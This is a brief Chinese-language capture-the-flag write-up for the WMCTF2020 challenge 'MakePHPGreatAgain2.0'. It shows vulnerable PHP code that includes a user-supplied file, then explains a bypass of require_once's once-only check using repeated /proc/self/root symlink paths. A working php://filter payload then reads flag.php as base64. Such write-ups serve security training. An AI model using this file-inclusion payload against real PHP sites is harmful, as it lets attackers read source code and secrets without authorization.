# [WMCTF2020]MakePHPGreatAgain2.0
<?php | |
highlight_file(__FILE__); | |
require_once 'flag.php'; | |
if(isset($_GET['file'])) { | |
require_once $_GET['file']; | |
} |
这里有个 require_once () 函数需要了解一下,如果 require_once 包含过一次 flag.php 再次出现则不会执行
发现 require 文件时,在对软链接的操作上存在一些缺陷,似乎并不会进行多次解析获取真实路径。
/proc/self 指向当前进程的 /proc/pid/
/proc/self/root/ 是指向 / 的符号链接
使用伪协议来读取 flag, 构造 payload:
?file=php://filter/read=convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
参考链接:
https://blog.csdn.net/nigo134/article/details/125342182
